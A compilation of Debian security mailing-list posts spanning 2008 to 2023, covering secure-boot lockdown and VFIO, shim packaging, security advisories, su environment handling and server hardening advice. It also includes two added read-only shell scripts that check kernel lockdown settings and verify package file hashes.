Re: [arm64] secure boot breach via VFIO_NOIOMMU
On Thu, Dec 14, 2023 at 09:26:09AM +0100, Salvatore Bonaccorso wrote:
> Hi,
>
> On Wed, Dec 13, 2023 at 10:45:01PM +0100, Bastian Blank wrote:
>> Hi
>>
>> Over six years ago, support for VFIO without IOMMU was enabled for
>> arm64. This is a breach of the integrity lockdown requirement of secure
>> boot.
>>
>> VFIO is a framework for handling devices in userspace. To make
>> this safe, an IOMMU is required by default. Without it, user space can
>> write everywhere in memory. The code is still not conditional on
>> lockdown, even if a patch was proposed.
>>
>> I intend to disable this option for all supported kernels.

Definitely.

> Agreed.
>
> For the readers reading this along, this was raised in context of
> https://salsa.debian.org/kernel-team/linux/-/merge_requests/925#note_446730
> and
> https://salsa.debian.org/kernel-team/linux/-/merge_requests/502#note_315464
>
> The proposed patch probably fell through the cracks.

Nod.

-- 
Steve McIntyre, Cambridge, UK.
The two hard things in computing:
 * naming things
 * cache invalidation
 * off-by-one errors  -- Stig Sandbeck Mathisen
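As an added check (it is not part of the thread and not Debian's own tooling), the script below reports whether a kernel was built with CONFIG_VFIO_NOIOMMU, whether the vfio module's unsafe no-IOMMU mode is switched on, and which lockdown mode is active, since a built-in option on a locked-down kernel is exactly the combination Bastian's mail describes. The /boot config path, the securityfs lockdown file and the vfio module parameter path in the usage comment are assumptions about a standard Debian layout.

```sh
#!/bin/sh
# Added example, not from the thread above: assess the VFIO-without-IOMMU
# exposure of a kernel from three files. Paths are passed as arguments so
# the functions can be run against saved copies; the live-host paths in the
# usage comment at the bottom are the usual Debian locations (assumed).

# kernel_option CONFIG_FILE OPTION -> prints y, m or n
# (n also when the option is absent or present only as "# ... is not set").
kernel_option() {
    file=$1
    opt=$2
    [ -r "$file" ] || { echo n; return; }
    val=$(grep -E "^${opt}=" "$file" | head -n 1 | cut -d= -f2)
    case "$val" in
        y|m) echo "$val" ;;
        *)   echo n ;;
    esac
}

# lockdown_mode LOCKDOWN_FILE -> prints the bracketed entry of
# /sys/kernel/security/lockdown, e.g. "integrity" for the contents
# "none [integrity] confidentiality"; prints "unknown" when the file is
# unreadable (kernel without lockdown support, or securityfs not mounted).
lockdown_mode() {
    file=$1
    [ -r "$file" ] || { echo unknown; return; }
    sed -n 's/.*\[\([a-z]*\)\].*/\1/p' "$file"
}

# noiommu_mode_enabled PARAM_FILE -> prints Y or N from the vfio module
# parameter file /sys/module/vfio/parameters/enable_unsafe_noiommu_mode;
# prints N when the file is missing (module not loaded or built without it).
noiommu_mode_enabled() {
    file=$1
    [ -r "$file" ] || { echo N; return; }
    tr -d '[:space:]' < "$file"
}

# assess CONFIG_FILE LOCKDOWN_FILE PARAM_FILE -> one summary line:
#   ok:   the option is not built, so it cannot be enabled at all
#   note: built, but the kernel is not locked down (or lockdown is unknown)
#   risk: built on a kernel in integrity or confidentiality lockdown, the
#         combination the thread calls a breach of the lockdown requirement
assess() {
    vfio=$(kernel_option "$1" CONFIG_VFIO_NOIOMMU)
    mode=$(lockdown_mode "$2")
    runtime=$(noiommu_mode_enabled "$3")
    if [ "$vfio" = n ]; then
        echo "ok: CONFIG_VFIO_NOIOMMU not built (lockdown=$mode)"
    elif [ "$mode" = integrity ] || [ "$mode" = confidentiality ]; then
        echo "risk: CONFIG_VFIO_NOIOMMU=$vfio under lockdown=$mode (unsafe mode currently $runtime)"
    else
        echo "note: CONFIG_VFIO_NOIOMMU=$vfio but lockdown=$mode (unsafe mode currently $runtime)"
    fi
}

# Usage on a live host (paths are the usual Debian locations, assumed):
#   assess "/boot/config-$(uname -r)" /sys/kernel/security/lockdown \
#          /sys/module/vfio/parameters/enable_unsafe_noiommu_mode
```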
DSA-5332 Missing from your cross references page
Hello,

I am hoping you can help with an issue we are seeing. We are using your page (https://www.debian.org/security/crossreferences) for cross references of Debian Security Advisories so that we can link the advisories to impacted CVEs. We have noticed that the following Security Advisory is missing:

https://security-tracker.debian.org/tracker/DSA-5332-1

Can you tell us whether there is a reason for this, or has this just been missed? If missed, would it be possible to get this data added please?

Regards,
Steve

Steve Mouer, Vice President | Product Management - Vulnerability Management | Cybersecurity and Technology Controls | JPMorgan Chase & Co.
[SECURITY] [DSA 5280-1] grub2 security update
- -------------------------------------------------------------------------
Debian Security Advisory DSA-5280-1                   secur...@debian.org
https://www.debian.org/security/                           Steve McIntyre
November 15, 2022                     https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : grub2
CVE ID         : CVE-2022-2601 CVE-2022-3775

Several issues were found in GRUB2's font handling code, which could result in crashes and potentially execution of arbitrary code. These could lead to bypass of UEFI Secure Boot on affected systems.

Further, issues were found in image loading that could potentially lead to memory overflows.

For the stable distribution (bullseye), these problems have been fixed in version 2.06-3~deb11u4.

We recommend that you upgrade your grub2 packages.

For the detailed security status of grub2 please refer to its security tracker page at:
https://security-tracker.debian.org/tracker/grub2

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org
Re: Problems with shim and shim-signed in unstable, and proposed solutions to unblock us
On Mon, Mar 04, 2019 at 04:30:46PM +, Steve McIntyre wrote:
>> 3. Upload new version of the shim-signed source package and a
>>    (lightly) bodged binary package
>> 3a. Use versions:
>>     - source: 1.28+nmu2
>>     - binary: 1.28+nmu2+0.9+1474479173.6c180c6-1
>> 3b. Needs as build-deps an old version of sbsigntool (0.6-3.2) and
>>     specifically version 0.9+1474479173.6c180c6-1 of shim in the
>>     build chroot
>> 3c. Then upload source+amd64
>> 3d. New shim-signed binary package changes in a few ways:
>>     * new version of the binary now includes fbx64.efi.signed and
>>       mmx64.efi.signed (copied across from the shim binary package)
>>     * add Replaces: shim (= 0.9+1474479173.6c180c6-1) so we don't
>>       conflict on those binaries
>>     * remove Depends: shim (the whole point!)
>>     * change Build-Depends to list the specific versions used for
>>       shim and sbsigntool
>> 3e. Already tested and working. I built this (source and binary
>>     debdiffs attached) and tested OK on SB system
>> 3f. This package is instantly RC-buggy due to the unavailable
>>     build-deps. We know...

I've just uploaded #3 to unstable this evening.

-- 
Steve McIntyre, Cambridge, UK.
"You can't barbecue lettuce!" -- Ellie Crane
Re: Problems with shim and shim-signed in unstable, and proposed solutions to unblock us
I've had a reply from Mark (ftpteam) in IRC:

On Sun, Mar 03, 2019 at 11:35:45PM +, Steve McIntyre wrote:
...
> So, we're looking at three hacky options here to work our way
> out of this hole. In (probably?) descending order of hackitude:
>
> 1. Ask the nice ftpmaster people to bodge the archive by hand:
> 1a. Remove the current shim source and binary packages from
>     unstable (version 15+1533136590.3beb971-2)
> 1b. Copy the older source and binary from buster back into
>     unstable for us.
> 1c. We're not even sure if this is *possible*, let alone a nice
>     thing to do - thoughts?
> 1d. Expecting that this might break all kinds of tools inside and
>     outside of the archive maybe?

And Mark says:

  "we don't want to go rewinding version numbers in unstable; that
  could lead to all sorts of unforeseeable breakage."

Much as we'd expected. Any more feedback please? Cyril prefers approach #2 below, I prefer #3.

> OR
>
> 2. Upload new bodged versions of shim and shim-signed to get us
>    back to working with the previously-signed shimx64.efi.signed
>    binary
> 2a. Create new shim and shim-signed source packages, along with
>     matching binary packages.
> 2b. These binary packages will contain the *exact* same EFI
>     binaries as we have in buster but with a higher version number
>     in the packaging.
> 2c. As we cannot *exactly* reproduce the binaries sensibly, we
>     will have to hand-hack the contents of the binary packages.
> 2d. We *know* this is grotty too, but we can at least make this
>     work entirely at a package level.
> 2e. Already tested and working: Cyril has built packages like this
>     and I have tested the results successfully on my test SB
>     system here.
>
> Current versions in buster:
>  - shim:
>    - source: 0.9+1474479173.6c180c6-1
>    - binary: 0.9+1474479173.6c180c6-1
>  - shim-signed:
>    - source: 1.28+nmu1
>    - binary: 1.28+nmu1+0.9+1474479173.6c180c6-1
>
> Possible versions targeting sid:
>  - shim:
>    - source: 16+1474479173.6c180c6-1 (bumped “epoch-like” N+
>      prefix, but same contents as 0.9+1474479173.6c180c6-1)
>    - binary: 16+1474479173.6c180c6-1
>  - shim-signed:
>    - source: 1.28+nmu2 (new upload to adjust the Depends)
>    - binary: 1.28+nmu2+16+1474479173.6c180c6-1
>
> OR
>
> 3. Upload new version of the shim-signed source package and a
>    (lightly) bodged binary package
> 3a. Use versions:
>     - source: 1.28+nmu2
>     - binary: 1.28+nmu2+0.9+1474479173.6c180c6-1
> 3b. Needs as build-deps an old version of sbsigntool (0.6-3.2) and
>     specifically version 0.9+1474479173.6c180c6-1 of shim in the
>     build chroot
> 3c. Then upload source+amd64
> 3d. New shim-signed binary package changes in a few ways:
>     * new version of the binary now includes fbx64.efi.signed and
>       mmx64.efi.signed (copied across from the shim binary package)
>     * add Replaces: shim (= 0.9+1474479173.6c180c6-1) so we don't
>       conflict on those binaries
>     * remove Depends: shim (the whole point!)
>     * change Build-Depends to list the specific versions used for
>       shim and sbsigntool
> 3e. Already tested and working. I built this (source and binary
>     debdiffs attached) and tested OK on SB system
> 3f. This package is instantly RC-buggy due to the unavailable
>     build-deps. We know...

-- 
Steve McIntyre, Cambridge, UK.
Is there anybody out there?
Re: powerpc update for amd64
On Sun Mar 04, 2018 at 07:35:37 +0100, SZÉPE Viktor wrote:
> What is the use of pushing an update with only powerpc changes to amd64?
> Thank you.

This is just a side-effect of the way the packages are built. When a new source upload is made then it is built for all available architectures, even if the changes are not useful / relevant for them.

Typically security updates apply to all architectures. In this case just be glad you got "lucky" - and you don't have to schedule reboot(s) of all your server(s).

Steve
-- 
https://steve.fi/
Re: [SECURITY] [DSA 3074-2] php5 regression update
On Wed Nov 19, 2014 at 14:57:13 +0100, David MENTRE wrote:
>> so people are advised to keep kernel symlink protection (sysctl
>> fs.protected_symlinks=1) enabled as it is by default on Wheezy
>
> This setting is not set on my Wheezy machine. How can I set it
> permanently (i.e. across reboots)?

Take a look at /etc/sysctl.conf, and the comments at the top of that file pointing to the man-page and other locations.

Steve
-- 
Git-based DNS hosting
https://dns-api.com/
Re: about bash and Debian Lenny
> Shellshock has such big impact on the internet so please give us Lenny
> package.

You need to remember that Debian is a project staffed by volunteers, some of whom have already offered packages. If you cannot trust random binaries then the patches are available.

If you do have a legitimate reason for not upgrading, then your choices are few - and largely consist of:

 * Rolling your own packages, via the public patches, which you will then trust.
 * Finding somebody trustworthy.
 * Upgrading.

My personal response to somebody requesting newer updates has got to be "What is your budget?"

Steve
-- 
http://www.steve.org.uk/
Re: goals for hardening Debian: ideas and help wanted
On Thu, Apr 24, 2014 at 11:45:46AM +0200, Giacomo Mulas wrote:
> On Thu, 24 Apr 2014, Paul Wise wrote:
>>> Would the inclusion of more AppArmor profiles be applicable?
>>
>> Thanks, added along with SELinux/etc.
>
> I second that. Actually, some time ago I tried using both AppArmor and
> SELinux, but gave up because it took forever to find legitimate
> behaviour of all kinds of common packages (most of them standard debian
> packages) and prepare configuration files for things to work. If debian
> wants to foster adoption of such security enhancements, it must go to
> great lengths in making sure that (in order of importance in my humble
> opinion)
>
> 1) all debian-packaged software works (very nearly) out of the box with
> debian-supported MAC frameworks. It should be very clear that if they
> don't it's an important bug that needs fixing. For example, such bugs
> should prevent the inclusion of a package in an official stable
> release. Or split the main debian archive in two, one that is MAC-ready
> and one that is not, so each user can decide to only use packages known
> to work well with debian-supported MAC frameworks.

The apparmor policies in Debian apply a principle of minimal harm, confining only those services for which someone has taken the time to verify the correct profile. There are obviously pros and cons to each approach to MAC, which I'm not interested in arguing about; but one of the pros of the approach taken for apparmor is that all software *does* continue to work out of the box. If you found it otherwise, I think you should be filing a bug report against apparmor.

-- 
Steve Langasek                   Give me a lever long enough and a Free OS
Debian Developer                   to set it on, and I can move the world.
Ubuntu Developer                                    http://www.debian.org/
Re: [SECURITY] [DSA 2521-1] libxml2 security update
My guess is libpfhttphook is not vulnerable. I'd like to hear from someone else tho.

http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=679280

-Steve

Sent from my phone

On Aug 4, 2012, at 12:31, Moritz Muehlenhoff wrote:
> CVE-2012-2807
Re: Logs errors on Debian Squeeze with Bind 9.7.3
Hello,

Couple thoughts:

1) You should add semi-colons onto the end of the category lines within the logging stanza.

2) I take it that you restarted bind after making changes in the configuration file?

Also note that /etc/bind/named.conf.options is the preferred place for the logging stanza, or so I've gathered.

Steve
http://www.braingia.org/

On Tue, Jun 28, 2011 at 01:13:31PM -0300, OLCESE, Marcelo Oscar. wrote:
> Good morning people
>
> Since I upgraded to BIND 9.7.3 Debian 6, I'm having a lot of logs as
> I've outlined.
>
> error (network unreachable) resolving '98.31.207.117.in-addr.arpa/PTR/IN': 2001:500:13::73#53: 1 Time(s)
> error (network unreachable) resolving 'ABTS-mp-Dynamic-075.161.168.122.airtelbroadband.in/A/IN': 2001:500:45::1#53: 1 Time(s)
> error (network unreachable) resolving 'NSS2.CODETEL.NET.DO//IN': 2001:468:d01:20::80df:2023#53: 1 Time(s)
> error (network unreachable) resolving 'SEC3.APNIC.NET/A/IN': 2001:500:13::c7d4:35#53: 1 Time(s)
> error (unexpected RCODE REFUSED) resolving '222.187.173.122.in-addr.arpa/PTR/IN': 202.56.230.5#53: 1 Time(s)
> error (unexpected RCODE REFUSED) resolving '244.76.168.122.in-addr.arpa/PTR/IN': 202.56.230.6#53: 1 Time(s)
> error (unexpected RCODE REFUSED) resolving 'ns01.wl-infra.net/A/IN': 62.75.191.6#53: 2 Time(s)
> error (unexpected RCODE SERVFAIL) resolving 'ns6.kvack.org/A/IN': 199.249.120.1#53: 1 Time(s)
> error (unexpected RCODE SERVFAIL) resolving 'utn.edu.ar/NS/IN': 200.16.98.2#53: 1 Time(s)
> error (unexpected RCODE SERVFAIL) resolving 'zone-ns6.dnswl.org/A/IN': 199.249.120.1#53: 1 Time(s)
> success resolving 'ABTS-MP-Dynamic-073.132.175.122.airtelbroadband.in/A' (in 'airtelbroadband.in'?) after disabling EDNS: 1 Time(s)
> success resolving 'ABTS-North-Dynamic-222.187.173.122.airtelbroadband.in/A' (in 'airtelbroadband.in'?) after reducing the advertised EDNS UDP packet size to 512 octets: 1 Time(s)
> success resolving 'ABTS-North-Static-039.25.160.122.airtelbroadband.in/A' (in 'airtelbroadband.in'?) after disabling EDNS: 1 Time(s)
> success resolving 'dnsbom.mantraonline.com/' (in 'mantraonline.com'?) after disabling EDNS: 1 Time(s)
> success resolving 'dnsdel.mantraonline.com/A' (in 'mantraonline.com'?) after disabling EDNS: 1 Time(s)
>
> I already made several changes including:
>
> /etc/default/bind9
>
> RESOLVCONF=yes
> OPTIONS="-4 -u bind -S 1024"
>
> and named.conf:
>
> logging {
>   category lame-servers {null;}
>   category edns-disabled {null;}
> };
>
> Any ideas?
>
> Regards,
> Marcelo O.
Re: [SECURITY] [DSA-2158-1] cgiirc security update
On Fri Feb 11, 2011 at 10:37:46 +0100, Axel Beckert wrote:
> This package does not yet show up in Lenny. According to
> http://packages.debian.org/search?keywords=cgiirc 0.5.9-3lenny1 has
> been uploaded to squeeze's security repo only.

Yes - this has been a bit of a mess, due to the release occurring during the middle of the preparation and release of the update.

I'm uploading for lenny/old-security now.

Steve
-- 
Debian GNU/Linux System Administration
http://www.debian-administration.org/
Re: Results of environment variable fuzzing Debian 5.05 SUID/SGIDs
On Tue Jan 18, 2011 at 13:49:23 +1100, Silvio Cesare wrote:
> lbreakout2
> http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=608980

That could well be a duplicate of CAN-2004-0158, which was fixed in Woody:
http://lists.debian.org/debian-changes/2004/02/msg00029.html

Steve
-- 
http://www.steve.org.uk/
Re: Results of environment variable fuzzing Debian 5.05 SUID/SGIDs
On Tue Jan 18, 2011 at 22:25:20 +1100, Silvio Cesare wrote:
> This kind of testing is good for Debian security and provides some
> comfort to me at least knowing this class of vulnerability has been
> tested for against the privileged programs in the Debian repository.

Agreed. I started doing the same thing a few years ago, and it was very useful.

However to make your reports more thorough it is important to look at the source of the code to see if the crash is an exploitable one or not. Ideally you'd include that information in any bug reports you submitted.

Steve
-- 
http://www.steve.org.uk/
Re: libapache2-mod-fcgid in lenny vulnerable to hole for weeks
On Tue Dec 21, 2010 at 22:21:35 +0100, Stefan Fritsch wrote:
> FWIW, it seems the infrastructure has been finally fixed today, so I
> hope things will improve now. But I do think that there are currently
> too few active members in the security team. I am pretty sure we will
> send out a request for new volunteers soon.

If there were a need for it I'd be happy to make myself available again for team work. I don't expect I'm going to suffer from being busy in the way that I was previously again.

Steve
-- 
http://www.steve.org.uk/
Re: rkhunter warning wget
On Thu Oct 15, 2009 at 17:55:39 +0200, m...@firstfloor.org wrote:
> after updating wget on Linux version 2.6.26-2-686 (Debian 2.6.26-19)
> Lenny i received a warning from rkhunter:
>
> Warning: The file properties have changed:
>   File: /usr/bin/wget
>   Current hash: 2d5d175c449eecfda43401a7a66b8a369859524d
>   Stored hash : 1725543768f7e1b2a32136ca1799213a8bdb886b
>   Current inode: 137892    Stored inode: 140983
>   Current size: 226292     Stored size: 226260
>   Current file modification time: 1255005510
>   Stored file modification time : 1220829421

You've applied a security update, which has changed the binary /usr/bin/wget.

The alert is telling you that the binary has changed, and since this is expected (because you've applied the security update) the alert is informational, not a real report.

Steve
-- 
Debian GNU/Linux System Administration
http://www.debian-administration.org/
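The check a practitioner would want before dismissing such a warning is to confirm that the changed binary is the one dpkg installed, by comparing it with the package's md5sums manifest. The script below is an added example, not from the thread or from rkhunter; it assumes dpkg's usual manifest location /var/lib/dpkg/info/<package>.md5sums and its "<md5>  <path without leading slash>" line format.

```sh
#!/bin/sh
# Added example, not from the thread above: after rkhunter reports that
# /usr/bin/wget changed, confirm that the new file is the one dpkg
# installed by checking it against the package's md5sums manifest.
# A match means the change came from the package update; a mismatch means
# the file differs from what the package shipped and deserves a closer look.
# Paths are passed as arguments so the functions can be exercised against a
# scratch tree; the live-host paths in the usage comment are assumed.

# file_matches_manifest MD5SUMS_FILE ROOT RELPATH
#   -> prints "match", "mismatch", or "unlisted" (RELPATH not in the manifest)
file_matches_manifest() {
    sums=$1
    root=$2
    rel=$3
    # manifest lines are "<md5>  <relative path>"; pick the hash for RELPATH
    expected=$(awk -v p="$rel" '$2 == p { print $1 }' "$sums")
    if [ -z "$expected" ]; then
        echo unlisted
        return
    fi
    actual=$(md5sum "$root/$rel" | cut -d' ' -f1)
    if [ "$actual" = "$expected" ]; then
        echo match
    else
        echo mismatch
    fi
}

# verify_pkg_md5sums MD5SUMS_FILE [ROOT]
#   -> exit 0 if every file in the manifest matches, non-zero otherwise;
#      mismatching paths are printed as "<path>: FAILED" by md5sum itself.
#   Manifest paths are relative, so the check is run from ROOT (default /).
verify_pkg_md5sums() {
    sums=$1
    root=${2:-/}
    [ -r "$sums" ] || { echo "no md5sums manifest: $sums" >&2; return 2; }
    (cd "$root" && md5sum -c --quiet) < "$sums"
}

# Usage on a live Debian host (manifest path as installed by dpkg, assumed):
#   file_matches_manifest /var/lib/dpkg/info/wget.md5sums / usr/bin/wget
#   verify_pkg_md5sums /var/lib/dpkg/info/wget.md5sums
```

Once the change is confirmed to come from the package, rkhunter --propupd refreshes its stored file properties so the same warning is not repeated on the next run.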
Re: Maintaining packages properly
On Wed Mar 18, 2009 at 21:01:04 -0400, Micah Anderson wrote:
> However, I do see your point about NEW packages, and it might be
> interesting, if we could get enough security auditors who had the
> skills and the time, to be a part of the NEW process. This could
> introduce an unnecessary delay in the processing of packages,
> depending on the depth and breadth of such an audit. Or even a false
> sense of security if people think that their packages are free of
> security holes if they've passed NEW.

The security audit project mostly seems to have stalled/died.

There was a time when there were people actively taking part and doing semi-directed audits of the archive. These days it is very very rare that anybody does so, which is unfortunate (speaking both as the person who started it, and as somebody who would love to have such an effort be more visible and active.)

I've been on the point of updating the webpages several times to say "this activity is dead, and these are merely historic notes" but haven't quite wanted to admit defeat.

>> Maybe more people could join the debian security audit team? For a
>> lot of PHP packages it would be enough to check whether certain
>> functions (e.g. htmlspecialchars) are found. If not, this is often an
>> indication of insufficient protection measures.

Calling all interested security people who have just been dying to show their skills, or develop stronger auditing skills!

I think if there is no such response then it is definitely time to call it a day and cease pretending we have auditors on hand.

Steve
-- 
Managed Anti-Spam Service
http://mail-scanning.com/
Re: Why is su preserving the environment?
On Sat, Jan 24, 2009 at 08:41:37AM +0100, Josselin Mouette wrote:
> it has been brought to my attention (through #512803) that su does not
> clean the environment at all. This has several security implications:
>   * variables like PERL5LIB or GTK_MODULES can be passed to another
>     user, leading to unwanted execution of code;
>   * variables like DBUS_SESSION_BUS_ADDRESS or XDG_SESSION_COOKIE
>     export authentication information that could be used to obtain
>     private information such as passwords in gnome-keyring.
>
> Before I work around this specific issue in the fugliest way, shouldn’t
> we prevent su from preserving the environment? There have been several
> security advisories related to sudo not cleaning the environment, and
> the final call has been to make env_reset the default. Is there any
> reason why su should not be considered vulnerable the same way?

Because su does not attempt to control what commands are being run; if you can su to another user, you can run arbitrary commands as that user, which means there's no sense in trying to filter the environment.

-- 
Steve Langasek                   Give me a lever long enough and a Free OS
Debian Developer                   to set it on, and I can move the world.
Ubuntu Developer                                    http://www.debian.org/
Re: [SECURITY] [DSA-1645-1] New lighttpd packages fix various problems
On Mon Oct 06, 2008 at 20:40:36 +0200, Gerfried Fuchs wrote:
> From reading the changelog these issues have all three been addressed
> in the 1.4.19-5 upload which was done a week ago already. Was this
> missed, or are the patches therein considered incomplete?

This was missed.

Steve
-- 
Managed Anti-Spam Service
http://mail-scanning.com/
Re: Bug#311772: Fwd: Password leaks are security holes
On Thu, Aug 28, 2008 at 09:36:41AM +0200, Giacomo A. Catenazzi wrote:
> auth.log was invented for this reason, and separated to standard log:
> it should be readable only by root,

Then there is a bug in another package if this is what should be, because /var/log/auth.log is readable by group adm on all my systems.

> Anyway root already has the capability to view passwords (i.e. by
> installing alternate login programs, sniffing tty, ...)

If the system uses MAC such as SELinux, this is not necessarily the case. We should design for such future technologies, and not expose passwords unnecessarily.

On Thu, Aug 28, 2008 at 01:05:19PM +0200, Johan Walles wrote:
>> auth.log was invented for this reason, and separated to standard log:
>> it should be readable only by root, because users make errors.
>
> It's readable by anybody with physical access to the hardware.

The logging we're talking about takes place in pam_unix. The normal password store for pam_unix is /etc/shadow, which is on the hard drive; if the user has physical access, they can run a password cracker against this file anyway and try to grab *all* user passwords, not just those of users who don't read before they type. (It's true that the passwords are not in /etc/shadow for systems using pam_unix together with NIS or NIS+, but I consider both NIS and NIS+ rather uninteresting cases.)

>> So auth.log should log usernames, so that users don't make the wrong
>> assumption that passwords are not accessible by root!
>
> I can see a point in logging *valid* usernames. Logging invalid
> usernames (which aren't unlikely to actually be passwords) is a
> security risk.

It provides information about username brute force attacks and other issues of concern to admins.

On Thu, Aug 28, 2008 at 11:55:49AM +0200, Nico Golde wrote:
> Maybe this is the case but that's why this file is only readable for
> root and the adm group. So if an attacker is able to read this file you
> have way more problems as he wouldn't need to check the auth log for
> user errors but could just trace the login process, crack shadow, write
> a custom pam module or something similar to get your login credentials.

No, that's not true. The only added permission the 'adm' group has on Debian is to be able to read log files; so this *does* expose passwords to users who wouldn't otherwise be able to get at them.

-- 
Steve Langasek                   Give me a lever long enough and a Free OS
Debian Developer                   to set it on, and I can move the world.
Ubuntu Developer                                    http://www.debian.org/
Re: [SECURITY] [DSA 1631-1] New libxml2 packages fix denial of service
On Tue Aug 26, 2008 at 20:13:58 +0200, Christoph Auer wrote:
>> Debian Security Advisory DSA-1631-_2_                [EMAIL PROTECTED]
>
> minor error in the subject

My apologies, I managed to miss that.

Steve
-- 
Managed Anti-Spam Service
http://mail-scanning.com/
Re: [SECURITY] [DSA 1631-1] New libxml2 packages fix denial of service
On Fri Aug 22, 2008 at 21:56:35 +0200, Christian Jaeger wrote:
> Just to make sure: have you seen the thread "Lenny users: attn about
> Gnome/libxml2 breakage" on the debian-user mailing list (started by me)?

No, I'm afraid I've not seen that. But looking over it I'm not sure if the problem is the same.

On my personal Debian Unstable machine I'm not seeing any breakage - nor on my Etch system. It is possible it is solely broken on Lenny, but I don't have any systems to look at.

I see you've reported a bug, so I guess we'll take it from there.

Steve
-- 
Managed Anti-Spam Service
http://mail-scanning.com/
Re: securing server
On 07-05-2008 at 17:34:08 +0800, Abdul Bijur Vallarkodath ([EMAIL PROTECTED]) wrote:
> just my two pence.

and my two centimes.

> * Change the ports of most ports like ssh, ftp, smtp, imap etc. from
> the default ones to some other ones.

From my poor understanding of security related issues, I guess this is totally useless since any (good) port scanner will defeat this without any problem.

Remember, security by obscurity is a bad idea.

-- 
Steve
Re: securing server
On 07-05-2008 at 19:39:57 +0800, Abdul Bijur Vallarkodath ([EMAIL PROTECTED]) wrote:
> haha. not really! if u have really managed an online server u'd have
> seen tons of attacks and login attempts on your default ports by bots
> looking around for weaker systems.

Yes I have also seen that very often.

> This is hence especially helpful, I myself have seen these bot attacks
> reduce to almost zero once i had changed the port numbers of various
> services on my system.

Sure, but that doesn't mean you're more secure, just that you have fewer scans (which can be achieved by some well-thought iptables rules).

> Now, you are talking about someone sitting and concentrating on your
> machine, thats a diff story all together. isn't it?

Yep, you're right. If someone really wants to attack you, changing the default port numbers will just postpone the moment the attacks will really start.

> you are smart, you should have known all this.

Just tried to pinpoint an issue.

Best regards
-- 
Steve
Re: [SECURITY] [DSA 1534-2] New iceape packages fix regression
On Thu Apr 24, 2008 at 14:13:14 -0700, Brad Dondale wrote:
> I have started 2 weeks holidays. If you have any technical support
> requests, please create a ticket with your online ticket system.
> Thanks!

Please fix your broken auto-responding system.

Steve
-- 
Debian GNU/Linux System Administration
http://www.debian-administration.org/
Re: Is oldstable security support duration something to be proud of?
On Mon Mar 10, 2008 at 17:57:04 -0400, Filipus Klutiero wrote:
> It should be supported as long as RHEL.

Give me piles of cash and I'll support it for as long as you want.

But this discussion is pointless. The statement is true: *we* are proud; regardless of whether you or anybody else agrees or not. As has already been hashed out on the debian-www list.

Steve
-- 
http://www.steve.org.uk/
Re: [vendor-sec] Re: qemu unchecked block read/write vulnerability
> Oops, it looks like I got the address wrong. I didn't intend to mail
> the public [EMAIL PROTECTED] list but rather the private security team
> list. Too late now.

For future reference we do see vendor-sec mails, so the second copy wasn't really necessary. (Although it is helpful to make sure we get mails if it looks like there is no visible progress.)

I hope that doesn't make you feel any worse!

Steve
Re: strange output for command ps
This looks normal to me. I believe 'ps' cuts off the USER column after a certain number of characters. To test, I just added a user 'stevesuehring' to a local Debian etch box and then logged in as that user. The ps output shows 1002 in the USER column rather than the name.

Steve

On Wed, Jan 30, 2008 at 11:48:10PM +0100, Lindo Nepi wrote:
> hi all.
> on my debian box (debian 4.0, kernel 2.6.18-4-686 #1 SMP Wed May 9
> 23:03:12 UTC 2007 i686 GNU/Linux) when i do ps aux i obtain:
>
> [EMAIL PROTECTED]:~$ ps aux
> USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
> root         1  0.0  0.1   1948   648 ?        Ss   Jan17   0:01 init [2]
> root         2  0.0  0.0      0     0 ?        S    Jan17   0:00 [migration/0]
> root         3  0.0  0.0      0     0 ?        SN   Jan17   0:00 [ksoftirqd/0]
> root         4  0.0  0.0      0     0 ?        S    Jan17   0:00 [events/0]
> root         5  0.0  0.0      0     0 ?        S    Jan17   0:00 [khelper]
> root         6  0.0  0.0      0     0 ?        S    Jan17   0:00 [kthread]
> root         9  0.0  0.0      0     0 ?        S    Jan17   0:00 [kblockd/0]
> [snip]
> root      2620  0.0  0.1   1572   572 ?        Ss   Jan17   0:00 /usr/sbin/acpid -c /etc/acpi/events -s /var/run/acp
> 103       2733  0.0  0.1   2252   860 ?        Ss   Jan17   0:00 /usr/bin/dbus-daemon --system
> 106       2741  0.0  0.7   5572  4040 ?        Ss   Jan17   0:01 /usr/sbin/hald
> root      2742  0.0  0.1   2892  1016 ?        S    Jan17   0:00 hald-runner
> 106       2748  0.0  0.1   2020   852 ?        S    Jan17   0:00 hald-addon-acpi: listening on acpid socket /var/run
> 106       2753  0.0  0.1   2020   864 ?        S    Jan17   0:00 hald-addon-keyboard: listening on /dev/input/event0
> root      2762  0.0  0.1   1812   620 ?        S    Jan17   0:10 hald-addon-storage: polling /dev/hdd
> [snip]
> www-data  6612  0.0  0.8  19112  4144 ?        SN   07:36   0:00 /usr/sbin/apache2 -k start
> www-data  6613  0.0  0.8  19112  4144 ?        SN   07:36   0:00 /usr/sbin/apache2 -k start
> www-data  6614  0.0  0.8  19112  4144 ?        SN   07:36   0:00 /usr/sbin/apache2 -k start
> 121       6678  0.0 22.3 123368 115416 ?       SNs  07:44   0:06 /usr/sbin/dansguardian
> 121       6679  0.0 22.3 123372 115360 ?       SN   07:44   0:11 /usr/sbin/dansguardian
> 121       6680  0.0 22.8 126300 118064 ?       SN   07:44   0:03 /usr/sbin/dansguardian
> 121      24594  0.0 22.5 130296 116300 ?       SN   08:22   0:02 /usr/sbin/dansguardian
> 121      24595  0.0 22.4 126600 116096 ?       SN   08:22   0:00 /usr/sbin/dansguardian
> 121      24596  0.0 22.5 124892 116300 ?       SN   08:22   0:01 /usr/sbin/dansguardian
> 121      24597  0.0 22.4 124240 115944 ?       SN   08:22   0:00 /usr/sbin/dansguardian
> 121      24598  0.0 22.4 123980 115928 ?       SN   08:22   0:00 /usr/sbin/dansguardian
> 121      24599  0.0 22.4 123716 115920 ?       SN   08:22   0:00 /usr/sbin/dansguardian
> 121      24600  0.0 22.4 123748 116052 ?       SN   08:22   0:00 /usr/sbin/dansguardian
> 121      29196  0.0 22.5 153460 116680 ?       SN   17:18   0:02 /usr/sbin/dansguardian
> 121      29197  0.0 22.5 130292 116332 ?       SN   17:18   0:00 /usr/sbin/dansguardian
> 121      29198  0.0 22.4 127920 116224 ?       SN   17:18   0:00 /usr/sbin/dansguardian
> 121      29199  0.0 22.4 124280 116152 ?       SN   17:18   0:00 /usr/sbin/dansguardian
> ^
